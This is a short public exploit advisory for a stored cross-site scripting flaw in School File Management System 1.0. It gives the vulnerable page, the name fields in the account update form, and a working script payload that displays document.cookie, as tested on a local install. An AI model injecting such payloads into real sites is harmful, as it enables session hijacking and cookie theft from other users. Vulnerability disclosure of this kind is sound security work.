# Exploit Title: School File Management System 1.0 - 'multiple' Stored Cross-Site Scripting# Date: 2021-02-11# Exploit Author: Pintu Solanki# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/14155/school-file-management-system.html# Software: : School File Management System 1.0# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4# Vulnerable Page: http://localhost/School%20File%20Management%20System/student_profile.php# Vulnerable functionality: 'Update Account'# Vulnerable Input Field : {Firtstname} {Lastname}# Payload used:
"><script>alert(document.cookie)</script># POC: Whenever we will go to the page (http://localhost/School%20File%20Management%20System/student_profile.php) where the script is injected, the stored script will be executed.# You will see your Javascript code (XSS) executed.
